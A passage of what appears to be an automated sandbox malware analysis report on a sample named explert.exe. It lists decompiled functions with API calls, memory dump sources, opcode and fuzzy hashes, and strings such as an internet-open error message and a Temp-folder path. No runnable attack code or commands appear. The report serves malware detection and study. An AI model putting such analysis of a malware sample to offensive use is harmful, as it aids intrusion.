                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Internet$CloseHandle$FileOpenRead
                                                                                                                                                                                            • String ID: Couldn't open Internet!$Couldn't open URL!
                                                                                                                                                                                            • API String ID: 3539267403-1021515825
                                                                                                                                                                                            • Opcode ID: c688d3fff9a4acdbd97173acd2ed76ef16be62c4ebcd0c18fb3853d1aa76a471
                                                                                                                                                                                            • Instruction ID: e97e448f0011a209cbf0a3d8bf62b22229f103d0d8d4f1d2facac2f1f548ee43
                                                                                                                                                                                            • Opcode Fuzzy Hash: c688d3fff9a4acdbd97173acd2ed76ef16be62c4ebcd0c18fb3853d1aa76a471
                                                                                                                                                                                            • Instruction Fuzzy Hash: DA5196B5A10609ABEF14DFA4DC4ABAEBF79FF44305F108119F901B7281E7749A44CBA0
                                                                                                                                                                                            Function 0055C978 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • _free.LIBCMT ref: 0055C98E
                                                                                                                                                                                              • Part of subcall function 0055CE37: HeapFree.KERNEL32(00000000,00000000,?,00566429,?,00000000,?,?,?,005666CC,?,00000007,?,?,00566BBF,?), ref: 0055CE4D
                                                                                                                                                                                              • Part of subcall function 0055CE37: GetLastError.KERNEL32(?,?,00566429,?,00000000,?,?,?,005666CC,?,00000007,?,?,00566BBF,?,?), ref: 0055CE5F
                                                                                                                                                                                            • _free.LIBCMT ref: 0055C99A
                                                                                                                                                                                            • _free.LIBCMT ref: 0055C9A5
                                                                                                                                                                                            • _free.LIBCMT ref: 0055C9B0
                                                                                                                                                                                            • _free.LIBCMT ref: 0055C9BB
                                                                                                                                                                                            • _free.LIBCMT ref: 0055C9C6
                                                                                                                                                                                            • _free.LIBCMT ref: 0055C9D1
                                                                                                                                                                                            • _free.LIBCMT ref: 0055C9DC
                                                                                                                                                                                            • _free.LIBCMT ref: 0055C9E7
                                                                                                                                                                                            • _free.LIBCMT ref: 0055C9F5
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                            • Opcode ID: ec99a7af3329ba2bb5edd33370232146be75419598044e7437dbb5fd27e8cc59
                                                                                                                                                                                            • Instruction ID: 29c3df6041195d33e0923fb225520b3ac41a6b573670f6756c8aea4550524e39
                                                                                                                                                                                            • Opcode Fuzzy Hash: ec99a7af3329ba2bb5edd33370232146be75419598044e7437dbb5fd27e8cc59
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A21D676900209AFCB02EF94C996CDE7FB8BF48741F4081A6B9059B521DB31FA49CB81
                                                                                                                                                                                            Function 0053C4C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 131COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • std::locale::_Init.LIBCPMT ref: 0053C4D7
                                                                                                                                                                                              • Part of subcall function 0054F760: std::_Lockit::_Lockit.LIBCPMT ref: 0054F772
                                                                                                                                                                                              • Part of subcall function 0054F760: std::locale::_Setgloballocale.LIBCPMT ref: 0054F78D
                                                                                                                                                                                              • Part of subcall function 0054F760: _Yarn.LIBCPMT ref: 0054F7A3
                                                                                                                                                                                              • Part of subcall function 0054F760: std::_Lockit::~_Lockit.LIBCPMT ref: 0054F7E3
                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0053C4EC
                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0053C507
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0053C527
                                                                                                                                                                                            • __Getcoll.LIBCPMT ref: 0053C5AA
                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0053C5DC
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0053C5F4
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$std::locale::_$Facet_GetcollInitRegisterSetgloballocaleYarn
                                                                                                                                                                                            • String ID: ios_base::badbit set
                                                                                                                                                                                            • API String ID: 1067193257-3882152299
                                                                                                                                                                                            • Opcode ID: c15928194d2f81d8ab9fe14cb97e24ae702b69ca3f3b8e3a0cdd486350134939
                                                                                                                                                                                            • Instruction ID: 99029c2c27bb8ee292840eac1b137433d11c43d63b43bc1f04bf4f2103e99841
                                                                                                                                                                                            • Opcode Fuzzy Hash: c15928194d2f81d8ab9fe14cb97e24ae702b69ca3f3b8e3a0cdd486350134939
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5341CF719002169FCB24DF68D8499AEBFB4FF90310F148569E806BB292DB31FD09CB91
                                                                                                                                                                                            Function 00553760 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 120COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00553797
                                                                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0055379F
                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00553828
                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00553853
                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 005538A8
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                            • String ID: @0S$O&U$csm
                                                                                                                                                                                            • API String ID: 1170836740-3755504247
                                                                                                                                                                                            • Opcode ID: 8f07dfa0ae4b18a956baa582fdc2ee5299555a0202c5ef6314ff6d7ffb72f5d8
                                                                                                                                                                                            • Instruction ID: 0245d66377412d1c5f5f435dc74492ab0ac1854de0ffe81ab5976fbb1b8144ec
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8f07dfa0ae4b18a956baa582fdc2ee5299555a0202c5ef6314ff6d7ffb72f5d8
                                                                                                                                                                                            • Instruction Fuzzy Hash: F241E174E002099BCF10DF68C899A9EBFB5FF45355F148096FC19AB392C731AA49CB90
                                                                                                                                                                                            Function 00531B80 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 110COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00531B92
                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00531BAD
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00531BCD
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00531C1E
                                                                                                                                                                                            • __Getctype.LIBCPMT ref: 00531C6D
                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00531C93
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00531CAB
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_GetctypeRegister
                                                                                                                                                                                            • String ID: dV
                                                                                                                                                                                            • API String ID: 2525760861-971893479
                                                                                                                                                                                            • Opcode ID: a67ddd73a67cb3ebe12de63a0777c519aa27677572fe41e1b14adbb8eeab2b9e
                                                                                                                                                                                            • Instruction ID: 312fb3cc1e6d8b76b2a7aa6611f28016b31d5dfc28413815489b6e7f81f18200
                                                                                                                                                                                            • Opcode Fuzzy Hash: a67ddd73a67cb3ebe12de63a0777c519aa27677572fe41e1b14adbb8eeab2b9e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B41F331A006199FCB10DF68D8959E9BBB4FF50314F146569EC0AAB352EB31ED49CBC0
                                                                                                                                                                                            Function 0055F84E Relevance: 13.8, APIs: 9, Instructions: 301COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 009c54be13120221d805ad0c40251b1e59c9b5ab8935462d10c351977d38fa7e
                                                                                                                                                                                            • Instruction ID: d2bfdaaacc5782b98d2d2c5f016ac3f5997ba33d600d46074414eab69b55ac18
                                                                                                                                                                                            • Opcode Fuzzy Hash: 009c54be13120221d805ad0c40251b1e59c9b5ab8935462d10c351977d38fa7e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 08C10470E04206EFDF15DF98D8A5BAD7FB4BF49322F14406AED04AB292C7709949CB61
                                                                                                                                                                                            Function 005661F1 Relevance: 13.7, APIs: 9, Instructions: 199COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _free
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                                                                            • Opcode ID: 16377dff718e34370175ecd5e0fb49860c88454d521e6fac879f4748136e0fab
                                                                                                                                                                                            • Instruction ID: 80629d53c92506d52e6cbe6c89ae3d427eda4fccb5243088fa472bd51439c30a
                                                                                                                                                                                            • Opcode Fuzzy Hash: 16377dff718e34370175ecd5e0fb49860c88454d521e6fac879f4748136e0fab
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0761E276A00305AFDB20DF64D851BAABFF9FF84710F10492AE955EB281EB70AD40DB50
                                                                                                                                                                                            Function 0055B0B9 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 255COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 0055CA90: GetLastError.KERNEL32(00531920,00000001,00531924,00556D0D,00000001,00000000,00000000,?,0055CD85,00000000,00000000,00000001,00000000,00531920,00000104), ref: 0055CA95
                                                                                                                                                                                              • Part of subcall function 0055CA90: SetLastError.KERNEL32(00000000,00000006,000000FF,?,0055CD85,00000000,00000000,00000001,00000000,00531920,00000104), ref: 0055CB33
                                                                                                                                                                                            • _free.LIBCMT ref: 0055B3A4
                                                                                                                                                                                            • _free.LIBCMT ref: 0055B3BD
                                                                                                                                                                                            • _free.LIBCMT ref: 0055B3FB
                                                                                                                                                                                            • _free.LIBCMT ref: 0055B404
                                                                                                                                                                                            • _free.LIBCMT ref: 0055B410
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _free$ErrorLast
                                                                                                                                                                                            • String ID: @0S$C
                                                                                                                                                                                            • API String ID: 3291180501-507328144
                                                                                                                                                                                            • Opcode ID: 5f7f82cb8e00cbb5086f9d56a580fb631a05b8181d89e384f031b1bca6c0a7ec
                                                                                                                                                                                            • Instruction ID: 290f997f2ff9e4368a03f943fefb52e901e6cbb8b18b2d703dd0dbed08b8ff18
                                                                                                                                                                                            • Opcode Fuzzy Hash: 5f7f82cb8e00cbb5086f9d56a580fb631a05b8181d89e384f031b1bca6c0a7ec
                                                                                                                                                                                            • Instruction Fuzzy Hash: FEB17C7590161ADFEB24DF18C8A9BADBBB5FF48305F5045AAE809A7350D730AE94CF40
                                                                                                                                                                                            Function 0055AC2E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 186COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 0056097D: HeapAlloc.KERNEL32(00000000,?,?,?,005518D8,?,?,?,?,?,005311E3,?,?), ref: 005609AF
                                                                                                                                                                                            • _free.LIBCMT ref: 0055AD3D
                                                                                                                                                                                            • _free.LIBCMT ref: 0055AD54
                                                                                                                                                                                            • _free.LIBCMT ref: 0055AD71
                                                                                                                                                                                            • _free.LIBCMT ref: 0055AD8C
                                                                                                                                                                                            • _free.LIBCMT ref: 0055ADA3
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _free$AllocHeap
                                                                                                                                                                                            • String ID: \2W$x2W
                                                                                                                                                                                            • API String ID: 1835388192-3612702823
                                                                                                                                                                                            • Opcode ID: f18ce5198a150787a04fd6607b09ffbcaa083e362edc7656070b8848dbc86a5e
                                                                                                                                                                                            • Instruction ID: ca6e3c42cfb260ab227182dfd1ac84996483f232ee8d8caa606d215e386739f0
                                                                                                                                                                                            • Opcode Fuzzy Hash: f18ce5198a150787a04fd6607b09ffbcaa083e362edc7656070b8848dbc86a5e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6551E371A003059FDB219F29DC52A6A7BF4FF84722F14466AEC49DB290E731EE089B41
                                                                                                                                                                                            Function 00531A50 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00531A62
                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00531A7D
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00531A9D
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00531AEE
                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00531B50
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00531B68
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_Register
                                                                                                                                                                                            • String ID: dV
                                                                                                                                                                                            • API String ID: 1858714459-971893479
                                                                                                                                                                                            • Opcode ID: 1b11d0e6afc8523bcbfb1b17288a56d8faba3f4bb686a36fe0088d5ecc10ead3
                                                                                                                                                                                            • Instruction ID: 0c2d54a5358f2c4ba5cbfdc07d6e7d818f6b711f91744e22d6498ba35c209a65
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b11d0e6afc8523bcbfb1b17288a56d8faba3f4bb686a36fe0088d5ecc10ead3
                                                                                                                                                                                            • Instruction Fuzzy Hash: C6310435A016119FCB20DF68D8959A9FBB0FF50350F1851A9EC4AAB351EB31ED4ACBC4
                                                                                                                                                                                            Function 00565522 Relevance: 12.2, APIs: 8, Instructions: 203COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _free$___from_strstr_to_strchr
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3409252457-0
                                                                                                                                                                                            • Opcode ID: 6083febe7f511870d26712ef4bf71ae5d9068466e5367ebbb81a697ef6f34d7a
                                                                                                                                                                                            • Instruction ID: 20927dc15e69fe1ecfe9787a9785219fe93bc269d278d8759f05d399277864a0
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6083febe7f511870d26712ef4bf71ae5d9068466e5367ebbb81a697ef6f34d7a
                                                                                                                                                                                            • Instruction Fuzzy Hash: D75125B1984742EFDF21AF64D896A6E7FB8FF41710F10456AE910AB181FB319908CB50
                                                                                                                                                                                            Function 005340F0 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 311COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: __fread_nolock
                                                                                                                                                                                            • String ID: ,V$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                            • API String ID: 2638373210-563886639
                                                                                                                                                                                            • Opcode ID: f79f432ffee02c6279f475860ac2c238344e912886373d5cf6554cdf4eac2777
                                                                                                                                                                                            • Instruction ID: b2b8a38ef7c0e13b62ae962ac9addd2ac22e2b5adc4cad9ed5267509651027f1
                                                                                                                                                                                            • Opcode Fuzzy Hash: f79f432ffee02c6279f475860ac2c238344e912886373d5cf6554cdf4eac2777
                                                                                                                                                                                            • Instruction Fuzzy Hash: 30A18936A001099FCB18CF6DC885AAEBBA5FF84320F148169FC19DB351DA31ED44CB90
                                                                                                                                                                                            Function 00564B2A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            • }LV, xrefs: 00564B7B
                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe, xrefs: 00564B2F
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe$}LV
                                                                                                                                                                                            • API String ID: 0-706804828
                                                                                                                                                                                            • Opcode ID: a54b994df0531878e428a8c8104f0652760f2c72ba73772579df8098ba3dad86
                                                                                                                                                                                            • Instruction ID: baad47b6c1652ba4aa4efad8865f1eeac3400e2b4ce60b24d5834cd1cab19d72
                                                                                                                                                                                            • Opcode Fuzzy Hash: a54b994df0531878e428a8c8104f0652760f2c72ba73772579df8098ba3dad86
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E21807560810AAFDF20AF65DC95E6B7FADFB803B87108515F91597161EB60EC408B60
                                                                                                                                                                                            Function 005666B3 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 005663FF: _free.LIBCMT ref: 00566424
                                                                                                                                                                                            • _free.LIBCMT ref: 00566701
                                                                                                                                                                                              • Part of subcall function 0055CE37: HeapFree.KERNEL32(00000000,00000000,?,00566429,?,00000000,?,?,?,005666CC,?,00000007,?,?,00566BBF,?), ref: 0055CE4D
                                                                                                                                                                                              • Part of subcall function 0055CE37: GetLastError.KERNEL32(?,?,00566429,?,00000000,?,?,?,005666CC,?,00000007,?,?,00566BBF,?,?), ref: 0055CE5F
                                                                                                                                                                                            • _free.LIBCMT ref: 0056670C
                                                                                                                                                                                            • _free.LIBCMT ref: 00566717
                                                                                                                                                                                            • _free.LIBCMT ref: 0056676B
                                                                                                                                                                                            • _free.LIBCMT ref: 00566776
                                                                                                                                                                                            • _free.LIBCMT ref: 00566781
                                                                                                                                                                                            • _free.LIBCMT ref: 0056678C
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                            • Opcode ID: 4bb7cfefca59b01fdb6ef220bd872d0b4c475c341da5657b3a5c2d1b5605872d
